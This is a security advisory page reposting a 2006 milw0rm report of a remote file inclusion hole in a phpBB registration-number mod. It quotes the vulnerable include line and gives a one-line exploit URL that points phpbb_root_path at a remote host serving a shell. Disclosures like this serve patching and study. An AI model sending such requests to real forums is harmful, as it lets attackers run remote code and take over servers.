Computer Security

Security Advisory: phpBB Random User Registration Number 1.0 Mod Inclusion Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Dimension of phpBB <= 0.2.5 (phpbb_root_path)
Remote File Includes

  phpBB Security Suite Mod 1.0.0 (logger_engine.
php) Remote File Include

  phpBB Security Suite Mod 1.0.0 (logger_engine.
php) Remote File Include

  PHP Live! <= 3.1 help.php Remote File Inclusion vulnerability

From:MILW0RM <submit_(at)_milw0rm.com>
Date:08.10.2006
Subject:phpBB Random User Registration Number 1.0 Mod Inclusion Vulnerability

- phpBB RANDOm USER REGISTRATION NUMBER 1.0 File Include Vulnerability

- bd0rk || SOH-Crew

- URL: http://www.nivisec.com/downloads/phpbb/random_image_register_v100.zip

- Code: include($phpbb_root_path . 'language/lang_' . $board_config['default_lang'] . '/lang_random_num_reg.' . $phpEx);

[+] Exploit: /includes/functions_num_image.php?phpbb_root_path=http://[target]/Shell?

Gr33tings: str0ke, TheJT, Lu7k, x0r_32

# milw0rm.com [2006-10-07]

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server